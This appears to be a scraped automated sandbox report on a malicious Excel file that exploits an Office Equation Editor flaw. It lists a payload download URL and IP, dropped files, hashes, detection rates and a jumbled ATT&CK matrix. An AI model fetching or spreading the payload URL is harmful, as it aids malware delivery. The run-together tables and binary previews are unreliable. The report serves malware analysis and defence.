    Source: C:\Users\Public\vbc.exeCode function: 4_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,4_2_0040352D
    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid Accounts1
    Native API
    Path Interception1
    Access Token Manipulation
    111
    Masquerading
    OS Credential Dumping1
    Security Software Discovery
    Remote Services1
    Archive Collected Data
    Exfiltration Over Other Network Medium1
    Encrypted Channel
    Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
    System Shutdown/Reboot
    Default Accounts12
    Exploitation for Client Execution
    Boot or Logon Initialization Scripts11
    Process Injection
    1
    Virtualization/Sandbox Evasion
    LSASS Memory1
    Virtualization/Sandbox Evasion
    Remote Desktop Protocol1
    Clipboard Data
    Exfiltration Over Bluetooth12
    Ingress Tool Transfer
    Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)1
    Extra Window Memory Injection
    1
    Access Token Manipulation
    Security Account Manager1
    Remote System Discovery
    SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
    Non-Application Layer Protocol
    Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)11
    Process Injection
    NTDS2
    File and Directory Discovery
    Distributed Component Object ModelInput CaptureScheduled Transfer121
    Application Layer Protocol
    SIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
    Obfuscated Files or Information
    LSA Secrets4
    System Information Discovery
    SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.common1
    Timestomp
    Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
    External Remote ServicesScheduled TaskStartup ItemsStartup Items1
    Extra Window Memory Injection
    DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    7027521.xlsx48%VirustotalBrowse
    7027521.xlsx24%MetadefenderBrowse
    7027521.xlsx44%ReversingLabsDocument-Office.Exploit.CVE-2017-11882
    SourceDetectionScannerLabelLink
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\raki[1].exe3%VirustotalBrowse
    C:\Users\user\AppData\Local\Temp\nsb1814.tmp\System.dll0%VirustotalBrowse
    C:\Users\user\AppData\Local\Temp\nsb1814.tmp\System.dll0%MetadefenderBrowse
    C:\Users\user\AppData\Local\Temp\nsb1814.tmp\System.dll0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\secur32.dll0%MetadefenderBrowse
    C:\Users\user\AppData\Local\Temp\secur32.dll0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\sxsstore.dll0%MetadefenderBrowse
    C:\Users\user\AppData\Local\Temp\sxsstore.dll0%ReversingLabs
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    http://50.16.4.125/E/raki.exe10%VirustotalBrowse
    http://50.16.4.125/E/raki.exe100%Avira URL Cloudmalware
    https://dariamob.ro/wed/eee_XScUCMEVL47.0%Avira URL Cloudsafe
    No contacted domains info
    NameMaliciousAntivirus DetectionReputation
    http://50.16.4.125/E/raki.exetrue
    • 10%, Virustotal, Browse
    • Avira URL Cloud: malware
    unknown
    https://dariamob.ro/wed/eee_XScUCMEVL47.true
    • Avira URL Cloud: safe
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    http://nsis.sf.net/NSIS_ErrorErrorvbc.exe, 00000004.00000000.464184566.000000000040A000.00000008.00000001.01000000.00000003.sdmp, vbc.exe, 00000004.00000002.679887439.000000000040A000.00000004.00000001.01000000.00000003.sdmp, vbc.exe.2.dr, raki[1].exe.2.drfalse
      high
      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs
      IPDomainCountryFlagASNASN NameMalicious
      50.16.4.125
      unknownUnited States
      14618AMAZON-AESUStrue
      Joe Sandbox Version:34.0.0 Boulder Opal
      Analysis ID:560280
      Start date:26.01.2022
      Start time:10:39:37
      Joe Sandbox Product:CloudBasic
      Overall analysis duration:0h 5m 47s
      Hypervisor based Inspection enabled:false
      Report type:full
      Sample file name:7027521.xlsx
      Cookbook file name:defaultwindowsofficecookbook.jbs
      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
      Number of analysed new started processes analysed:7
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • HDC enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Detection:MAL
      Classification:mal100.troj.expl.winXLSX@4/24@0/1
      EGA Information:
      • Successful, ratio: 100%
      HDC Information:
      • Successful, ratio: 63.2% (good quality ratio 61.9%)
      • Quality average: 88.3%
      • Quality standard deviation: 21%
      HCA Information:
      • Successful, ratio: 100%
      • Number of executed functions: 33
      • Number of non-executed functions: 35
      Cookbook Comments:
      • Adjust boot time
      • Enable AMSI
      • Found application associated with file extension: .xlsx
      • Found Word or Excel or PowerPoint or XPS Viewer
      • Attach to Office via COM
      • Scroll down
      • Close Viewer
      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, svchost.exe
      TimeTypeDescription
      10:40:43API Interceptor56x Sleep call for process: EQNEDT32.EXE modified
      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
      50.16.4.125listing new.xlsxGet hashmaliciousBrowse
      • 50.16.4.125/E/raki.exe
      new.xlsxGet hashmaliciousBrowse
      • 50.16.4.125/E/raki.exe
      No context
      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
      AMAZON-AESUSnew order.xlsxGet hashmaliciousBrowse
      • 54.86.206.225
      oSqoWgc5LDGet hashmaliciousBrowse
      • 52.86.166.183
      ft4et5G1aJGet hashmaliciousBrowse
      • 54.243.247.91
      DLSP1kcJYo.msiGet hashmaliciousBrowse
      • 3.209.18.1
      FedEx Package.exeGet hashmaliciousBrowse
      • 54.87.130.189
      dx86Get hashmaliciousBrowse
      • 100.25.242.33
      Offer O21391.xlsxGet hashmaliciousBrowse
      • 54.86.206.225
      nXJslq1j2Q.msiGet hashmaliciousBrowse
      • 34.196.43.38
      K8TAzm8P8dGet hashmaliciousBrowse
      • 3.236.62.186
      SKM-210221.exeGet hashmaliciousBrowse
      • 54.87.130.189
      VO5TqZ4EWG.exeGet hashmaliciousBrowse
      • 3.86.167.116
      MuITBxQYjZ.exeGet hashmaliciousBrowse
      • 3.86.167.116
      Report citrix.com--603304-df.htmGet hashmaliciousBrowse
      • 52.0.247.76
      MAybe bad - InBios International, Inc. ACH Detail 1.21.2022.xlsxGet hashmaliciousBrowse
      • 52.4.69.251
      MAybe bad - InBios International, Inc. ACH Detail 1.21.2022.xlsxGet hashmaliciousBrowse
      • 34.228.253.182
      meerkat.arm7Get hashmaliciousBrowse
      • 34.227.227.67
      meerkat.mpslGet hashmaliciousBrowse
      • 100.27.169.210
      com.niotron.harshithks3177.turnitin-5-apktada.com.apkGet hashmaliciousBrowse
      • 18.232.28.189
      com.niotron.harshithks3177.turnitin-5-apktada.com.apkGet hashmaliciousBrowse
      • 35.174.78.146
      meerkat.sh4Get hashmaliciousBrowse
      • 54.209.234.141
      No context
      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
      C:\Users\user\AppData\Local\Temp\nsb1814.tmp\System.dllSdEkI4IDqd.exeGet hashmaliciousBrowse
        SdEkI4IDqd.exeGet hashmaliciousBrowse
          cP5nXH8fQI.exeGet hashmaliciousBrowse
            cP5nXH8fQI.exeGet hashmaliciousBrowse
              BL Copy.docGet hashmaliciousBrowse
                jqkuxbwi.exeGet hashmaliciousBrowse
                  HealthSystray.exeGet hashmaliciousBrowse
                    jqkuxbwi.exeGet hashmaliciousBrowse
                      listing new.xlsxGet hashmaliciousBrowse
                        Pnportd65.exeGet hashmaliciousBrowse
                          Pnportd65.exeGet hashmaliciousBrowse
                            PO-C - 20211213-PLATE.docGet hashmaliciousBrowse
                              new.xlsxGet hashmaliciousBrowse
                                8#Ub2e4).exeGet hashmaliciousBrowse
                                  eW8Jsngljx.exeGet hashmaliciousBrowse
                                    o4XzTr73Ut.exeGet hashmaliciousBrowse
                                      uDZovIdfEJ.exeGet hashmaliciousBrowse
                                        q6JYc6gWld.exeGet hashmaliciousBrowse
                                          fw8ex1BNek.exeGet hashmaliciousBrowse
                                            16c6a61f609b7ef5cd13fc587805018efad3be4254591.exeGet hashmaliciousBrowse
                                              Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                              Category:downloaded
                                              Size (bytes):170120
                                              Entropy (8bit):7.49730405573374
                                              Encrypted:false
                                              SSDEEP:3072:TbG7N2kDTHUpou0lvStHlquLNLb+tAGGTCXIQOKGDYq8rmIdaDm2ghplPd:TbE/HUMFSeKSWSIQOKGDwiIoDyhplV
                                              MD5:0DCB37FF90B93B7A3225707B1AF111B8
                                              SHA1:E43402BD22A03687FC4FBE36CBB607ECC7BC1A0F
                                              SHA-256:4468C48F99C92E56BB04921A42676511C64B39F9AE99FCD08F2A10251618BAF2
                                              SHA-512:AF5D2C9D6F3EEFEACE0E9F4907251F0EB80494988A607C40B4CDA1F0EA6EE23F1D888D12F9724F6BE16EAEBA52A46F6E79136EC3D4DA0410D6E034E629E091D6
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Virustotal, Detection: 3%, Browse
                                              Reputation:low
                                              IE Cache URL:http://50.16.4.125/E/raki.exe
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L...Z.Oa.................j..........-5............@.................................|.....@..........................................................................................................................................................text....h.......j.................. ..`.rdata...............n..............@..@.data...............................@....ndata...`...`...........................rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                              Category:dropped
                                              Size (bytes):1099960
                                              Entropy (8bit):2.0153934122762553
                                              Encrypted:false
                                              SSDEEP:3072:ZXtr8tV3Iqf4ZdAt06J6dabLr92W2qtX2cT:3ahIFdyiaT2qtXl
                                              MD5:D6822083BFFC8F231A49532F07C2912A
                                              SHA1:7DFEB1E76C379822A45B7A22B3049479485A8AAF
                                              SHA-256:3BF445DA5FFB7F79F35705E01D731098AAF6FEC17EBE16BB20C88E232FC5AA90
                                              SHA-512:1E296BBE0841CD7968C67CC9F3DF873F75735B5E6FECBC55141D782E8277CB98DC12E0B0FB9EC556E5067F3815AB1E232B2F0CD5D1497D8D4860CEBD67158119
                                              Malicious:false
                                              Reputation:low
                                              Preview:....l...............C...........m>..?$.. EMF........&...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i.....................................................[V$...H....feV.@..%...$...h...........L...RQ.W............4.......$Q.W........ ...IdeV........ ............deV........................................%...X...%...7...................{$..................C.a.l.i.b.r.i...........X...X............8]V........dv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@....C.......L.......................P... ...6...F..........EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:PNG image data, 150 x 150, 8-bit/color RGBA, non-interlaced
                                              Category:dropped
                                              Size (bytes):5396
                                              Entropy (8bit):7.915293088075047
                                              Encrypted:false
                                              SSDEEP:96:f8W/+DRQgDhhXoFGUAAX5QLwh9eDYfaiy3cHIOZ7NLXgGFMtu4vPWY1TIwD4i:f8agQgDhhXoFGUP2Lwh98YfaxcHIOPLo
                                              MD5:590B1C3ECA38E4210C19A9BCBAF69F8D
                                              SHA1:556C229F539D60F1FF434103EC1695C7554EB720
                                              SHA-256:E26F068512948BCE56B02285018BB72F13EEA9659B3D98ACC8EEBB79C42A9969
                                              SHA-512:481A24A32C9D9278A8D3C7DB86CAC30303F11C8E127C3BB004B9D5E6EDDF36830BF4146E35165DF9C0D0FB8C993679A067311D2BA3713C7E0C22B5470862B978
                                              Malicious:false
                                              Reputation:moderate, very likely benign file
                                              Preview:.PNG........IHDR.............<.q.....IDATx..Yo.......}.B.Z-9.";r..F..A..h....)z.~.~. .M......ia..]'Qc[ri.Dm.%R.>.9..S[.B....yn$.y.yg...9.y.{..i.t..ix<.N.....Z......}.H..A.o..[..\Gm..a....er.m....f!....$133..."...........R..h4.x.^.Earr.?..O..qz{{..........322...@Gm..y.?~L2..Z...:....0p..x<..n7.p.z..G....@.uVVV....t....x.vH<...h...J...h.(..a...O>.GUU....|.2..\ ..........p....q..P..............(.....0p.\<~..x<...2.d...E..:.H.+.7..y...n.&.i"I.{.8..-..o......q.fX.G....... .%.....f.........=.(.|>.....===<x....!L.$..R.........:.....Bww7.h...E.^G.e.^/..R(.H$....TU%...v._.]..ID....N'..=bdd..7oR..i6...a..4g.....B.@&......|>...?299I&.!....:....nW.4...?......|..G..I....+......@WW..J.d2.......&.J155u.s>..K....iw.@..C.$<.....H$...D.4...... ....Fy..!.x....W_}.O..S<...D...UUeii.d2.....T...O.Z.X,.....j..nB....Q..p8..R..>.N..j....eg.....V.....Q.h4.....$I"...u..m.!.... ..1*...6.>.....,....xP......\.c.&.x.B.@$.!.Ju4.z.y..1.f.T*.$I.J%....u.......qL.P(..F.......*....\....^..
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:PNG image data, 139 x 180, 8-bit colormap, non-interlaced
                                              Category:dropped
                                              Size (bytes):3747
                                              Entropy (8bit):7.932023348968795
                                              Encrypted:false
                                              SSDEEP:96:4apPN/1Cb2ItR9rXu7p6mtnOCRxMJZtFtQcgBF5c2SGA:1Pp1kRROtrRxSyRjST1
                                              MD5:5EB99F38CB355D8DAD5E791E2A0C9922
                                              SHA1:83E61CDD048381C86E3C3EFD19EB9DAFE743ADBA
                                              SHA-256:5DAC97FDBD2C2D5DFDD60BF45F498BB6B218D8BFB97D0609738D5E250EBBB7E0
                                              SHA-512:80F32B5740ECFECC5B084DF2C5134AFA8653D79B91381E62A6F571805A6B44D52D6FD261A61A44C33364123E191D974B87E3FEDC69E7507B9927936B79570C86
                                              Malicious:false
                                              Reputation:moderate, very likely benign file
                                              Preview:.PNG........IHDR.............../.....tEXtSoftware.Adobe ImageReadyq.e<...]PLTE............&f||}\\].........5G}..._l....778....................................................IDATx..]...<.nh........../)....;..~;.U..>.i.$..0*..QF@.)."..,.../._,.y,...z....c.wuI{.Xt.!f.%.!.!....X..<....)..X...K.....T.&h.U4.x.......*......v;.R.a..i.B.......A.T`.....v....N..u.........NG......e....}.4=."{.+.."..7.n....Qi5....4....(.....&.......e...].t...C'.eYFmT..1..CY.c.t.............G./.#..X....{.q.....A..|.N.i.<Y1.^>..j..Zlc....[<.z..HR......b..@.)..U...:-...9'.u. ..-sD..,.h....oo...8..M.8.*.4...........*.f..&X..V......#.BN..&>R.....&.Q.&A}Bl9.-.G.wd`.$...\.......5<..O.wuC....I.....<....(j.c,...%.9..'.....UDP.*@...#.XH.....<V...!.../...(<.../..,...l6u...R...:..t..t......m+....OI...........+X._..|S.x.6..W..../sK.}a..]EO..../....yY.._6..../U.Q.|Z,`.:r.Y.B...I.Z.H...f....SW..}.k.?.^.'..F....?*n1|.?./.....#~|.y.r.j..u.Z...).......F.,m.......6..&..8."o...^..8.B.w...R.\..R.
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:PNG image data, 139 x 180, 8-bit colormap, non-interlaced
                                              Category:dropped
                                              Size (bytes):2647
                                              Entropy (8bit):7.8900124483490135
                                              Encrypted:false
                                              SSDEEP:48:H73wCcD5X+ajENpby1MTln0V1oPd8V8EAWG09tXIa1iBINm4YwFi9:H73KAajQPiMWJG08a1qINm4jU9
                                              MD5:E46357D82EBC866EEBDA98FA8F94B385
                                              SHA1:76C27D89AB2048AE7B56E401DCD1B0449B6DDF05
                                              SHA-256:B77A19A2F45CBEE79DA939F995DBD54905DED5CB31E7DB6A6BE40A7F6882F966
                                              SHA-512:8EC0060D1E4641243844E596031EB54EE642DA965078B5A3BC0B9E762E25D6DF6D1B05EACE092BA53B3965A29E3D34387A5A74EB3035D1A51E8F2025192468F3
                                              Malicious:false
                                              Reputation:moderate, very likely benign file
                                              Preview:.PNG........IHDR.............../....EPLTE.......................o...ttu`aaLML.s;.../-,................~_)$....IDATx..].b.*....Y\.....o..4...bl.6.1...Y.".|.2A@y.../...X.X..X..2X.........o.Xz}go.*m..UT.DK...ukX.....t.%..iB......w.j.1].].m....._)T...Z./.%.tm..Eq...v...wNX@.I..'$CS:e.K.Un.U.v......*.P.j. .5.N.5,..B]....y..2!..^.?...5..A...>"....)...}.*.....{[e4(.Nn....x.,....t.1..6.....}K).$.I.%n$b..G.g.w.....M..w..B.......tF".YtI..C.s.~)..<@"......-..._.(x...b..C..........;5.=.......c...s.....>.E;g.#.hk.Q..g,o;Z`.$.p&.8..ia...La....~XD.4p...8......HuYw.~X.+&Q.a.H.C..ly..X..a.?O.yS,C.r..........Xbp&.D..1.....c.cp..G.....L.M..2..5...4..L.E..`.`9...@...A.....A.E;...YFN.A.G.8..>aI.I.,...K..t..].FZ...E..F....Do../.d.,..&.f.e!..6.......2.;..gNqH`...X..\...AS...@4...#.....!D}..A_....1.W..".S.A.HIC.I'V...2..~.O.A}N........@K.B./...J,.E.....[`I>.F....$v$...:,..H..K.om.E..S29kM/..z.W...hae..62z%}y..q..z...../M.X..)....B eC..........x.C.42u...W...7.7.7
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced
                                              Category:dropped
                                              Size (bytes):10202
                                              Entropy (8bit):7.870143202588524
                                              Encrypted:false
                                              SSDEEP:192:hxKBFo46X6nPHvGePo6ylZ+c5xlYYY5spgpb75DBcld7jcnM5b:b740IylZ+c5xlYF5Sgd7tBednd
                                              MD5:66EF10508ED9AE9871D59F267FBE15AA
                                              SHA1:E40FDB09F7FDA69BD95249A76D06371A851F44A6
                                              SHA-256:461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
                                              SHA-512:678656042ECF52DAE4132E3708A6916A3D040184C162DF74B78C8832133BCD3B084A7D03AC43179D71AD9513AD27F42DC788BCBEE2ACF6FF5E7FEB5C3648B305
                                              Malicious:false
                                              Preview:.PNG........IHDR...............|.....sRGB.........gAMA......a.....pHYs..........o.d..'oIDATx^.k...u.D.R.b\J"Y.*.".d.|pq..2.r,.U.#.)F.K.n.).JI)."....T.....!.....`/H. ...\<...K...DQ"..]..(RI..>.s..t..w.>..U....>.....s/....1./^..p..........Z.H3.y..:..<..........[...@[.........Z.`E....Y:{.,.<y..x....O..................M....M........:..tx..*..........'o..kh.0./.3.7.V...@t........x......~...A.?w....@...A]h.0./.N..^,h......D.....M..B..a}a.a.i.m...D.....M..B..a}a.a.........A]h.0.....P41..-........&.!...!.x......(.......e..a :.+.|.Ut.U_..........2un......F7[.z.?...&..qF}.}..]I...+..J.w.~Aw....V..-.....B, W.5..P.y....>[.....q.t.6U<..@.....qE9.nT.u...`..AY.?...Z<.D.t...HT..A.....8.)..M...k\...v...`..A..?.N.Z<.D.t.Htn.O.sO...0..wF...W.#H...!p....h...|.V+Kws2/......W*....Q.,...8X.)c...M..H.|.h.0....R...Mg!...B...x..;....Q..5........m.;.Q./9..e"{Y.P..1x...FB!....C.G.......41.........@t@W......B/.n.b...w..d....k'E..&..%l.4SBt.E?..m...eb*?.....@.....a :.+H...Rh..
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced
                                              Category:dropped
                                              Size (bytes):10202
                                              Entropy (8bit):7.870143202588524
                                              Encrypted:false
                                              SSDEEP:192:hxKBFo46X6nPHvGePo6ylZ+c5xlYYY5spgpb75DBcld7jcnM5b:b740IylZ+c5xlYF5Sgd7tBednd
                                              MD5:66EF10508ED9AE9871D59F267FBE15AA
                                              SHA1:E40FDB09F7FDA69BD95249A76D06371A851F44A6
                                              SHA-256:461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
                                              SHA-512:678656042ECF52DAE4132E3708A6916A3D040184C162DF74B78C8832133BCD3B084A7D03AC43179D71AD9513AD27F42DC788BCBEE2ACF6FF5E7FEB5C3648B305
                                              Malicious:false
                                              Preview:.PNG........IHDR...............|.....sRGB.........gAMA......a.....pHYs..........o.d..'oIDATx^.k...u.D.R.b\J"Y.*.".d.|pq..2.r,.U.#.)F.K.n.).JI)."....T.....!.....`/H. ...\<...K...DQ"..]..(RI..>.s..t..w.>..U....>.....s/....1./^..p..........Z.H3.y..:..<..........[...@[.........Z.`E....Y:{.,.<y..x....O..................M....M........:..tx..*..........'o..kh.0./.3.7.V...@t........x......~...A.?w....@...A]h.0./.N..^,h......D.....M..B..a}a.a.i.m...D.....M..B..a}a.a.........A]h.0.....P41..-........&.!...!.x......(.......e..a :.+.|.Ut.U_..........2un......F7[.z.?...&..qF}.}..]I...+..J.w.~Aw....V..-.....B, W.5..P.y....>[.....q.t.6U<..@.....qE9.nT.u...`..AY.?...Z<.D.t...HT..A.....8.)..M...k\...v...`..A..?.N.Z<.D.t.Htn.O.sO...0..wF...W.#H...!p....h...|.V+Kws2/......W*....Q.,...8X.)c...M..H.|.h.0....R...Mg!...B...x..;....Q..5........m.;.Q./9..e"{Y.P..1x...FB!....C.G.......41.........@t@W......B/.n.b...w..d....k'E..&..%l.4SBt.E?..m...eb*?.....@.....a :.+H...Rh..
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 160x160, frames 3
                                              Category:dropped
                                              Size (bytes):4396
                                              Entropy (8bit):7.884233298494423
                                              Encrypted:false
                                              SSDEEP:96:1rQzp0lms5HqrrVflQ9MS5Bmy9CSKgpEfSgHk4oPQwb/BD+qSzAGW:1UF0EmEiSS3mKbbpDSk4oYwbBD+qKAX
                                              MD5:22FEC44258BA0E3A910FC2A009CEE2AB
                                              SHA1:BF6749433E0DBCDA3627C342549C8A8AB3BF51EB
                                              SHA-256:5CD7EA78DE365089DDDF47770CDECF82E1A6195C648F0DB38D5DCAC26B5C4FA5
                                              SHA-512:8ED1D2EE0C79AFAB19F47EC4DE880C93D5700DB621ACE07D82F32FA3DB37704F31BE2314A7A5B55E4913131BCA85736C9AC3CB5987BEE10F907376D76076E7CA
                                              Malicious:false
                                              Preview:......JFIF........................................................... ....+!.$...2"3*7%"0....................".........................."..............#............."...........................................................!1."AQa..q.#2R....BS.....$3Tb.4D%Crs................................................!R...AQa..1.."Sbq...............?....A.s..M...K.w.....E......!2.H...N.,E.+.i.z.!....-IInD..G....]L.u.R.lV...%aB.k.2mR.<..=."a.u...}},....:..C..I...A9w.....k.....>. .Gi......f.l...2..)..T...JT....a$t5..)..."... .. .. ....Gc..eS.$....6..._=.... d ....HF-.~.$s.9."T.nSF.pARH.@H..=y.B..IP."K$...u.h]*.#'zZ...2.hZ...K.K..b#s&...c@K.AO.*.}.6....\..i....."J..-.I/....c.R...f.I.$.....U.>..LNj..........G....wuF.5*...RX.9.-(D.[$..[...N%.29.W,...&i.Y6.:q.xi.......o...lJe.B.R+.&..a.m..1.$.,)5.)/..w.1......v.d..l...bB..JLj]wh.SK.L.....%S....NAI.)B7I.e..4.5...6......L.j...eW.=..u....#I...li..l....`R.o.<.......C.`L2...c...W..3.\...K...%.a..M.K.l.Ad...6).H?..2.Rs..3+.
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:PNG image data, 150 x 150, 8-bit/color RGBA, non-interlaced
                                              Category:dropped
                                              Size (bytes):5396
                                              Entropy (8bit):7.915293088075047
                                              Encrypted:false
                                              SSDEEP:96:f8W/+DRQgDhhXoFGUAAX5QLwh9eDYfaiy3cHIOZ7NLXgGFMtu4vPWY1TIwD4i:f8agQgDhhXoFGUP2Lwh98YfaxcHIOPLo
                                              MD5:590B1C3ECA38E4210C19A9BCBAF69F8D
                                              SHA1:556C229F539D60F1FF434103EC1695C7554EB720
                                              SHA-256:E26F068512948BCE56B02285018BB72F13EEA9659B3D98ACC8EEBB79C42A9969
                                              SHA-512:481A24A32C9D9278A8D3C7DB86CAC30303F11C8E127C3BB004B9D5E6EDDF36830BF4146E35165DF9C0D0FB8C993679A067311D2BA3713C7E0C22B5470862B978
                                              Malicious:false
                                              Preview:.PNG........IHDR.............<.q.....IDATx..Yo.......}.B.Z-9.";r..F..A..h....)z.~.~. .M......ia..]'Qc[ri.Dm.%R.>.9..S[.B....yn$.y.yg...9.y.{..i.t..ix<.N.....Z......}.H..A.o..[..\Gm..a....er.m....f!....$133..."...........R..h4.x.^.Earr.?..O..qz{{..........322...@Gm..y.?~L2..Z...:....0p..x<..n7.p.z..G....@.uVVV....t....x.vH<...h...J...h.(..a...O>.GUU....|.2..\ ..........p....q..P..............(.....0p.\<~..x<...2.d...E..:.H.+.7..y...n.&.i"I.{.8..-..o......q.fX.G....... .%.....f.........=.(.|>.....===<x....!L.$..R.........:.....Bww7.h...E.^G.e.^/..R(.H$....TU%...v._.]..ID....N'..=bdd..7oR..i6...a..4g.....B.@&......|>...?299I&.!....:....nW.4...?......|..G..I....+......@WW..J.d2.......&.J155u.s>..K....iw.@..C.$<.....H$...D.4...... ....Fy..!.x....W_}.O..S<...D...UUeii.d2.....T...O.Z.X,.....j..nB....Q..p8..R..>.N..j....eg.....V.....Q.h4.....$I"...u..m.!.... ..1*...6.>.....,....xP......\.c.&.x.B.@$.!.Ju4.z.y..1.f.T*.$I.J%....u.......qL.P(..F.......*....\....^..
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:PNG image data, 139 x 180, 8-bit colormap, non-interlaced
                                              Category:dropped
                                              Size (bytes):2647
                                              Entropy (8bit):7.8900124483490135
                                              Encrypted:false
                                              SSDEEP:48:H73wCcD5X+ajENpby1MTln0V1oPd8V8EAWG09tXIa1iBINm4YwFi9:H73KAajQPiMWJG08a1qINm4jU9
                                              MD5:E46357D82EBC866EEBDA98FA8F94B385
                                              SHA1:76C27D89AB2048AE7B56E401DCD1B0449B6DDF05
                                              SHA-256:B77A19A2F45CBEE79DA939F995DBD54905DED5CB31E7DB6A6BE40A7F6882F966
                                              SHA-512:8EC0060D1E4641243844E596031EB54EE642DA965078B5A3BC0B9E762E25D6DF6D1B05EACE092BA53B3965A29E3D34387A5A74EB3035D1A51E8F2025192468F3
                                              Malicious:false
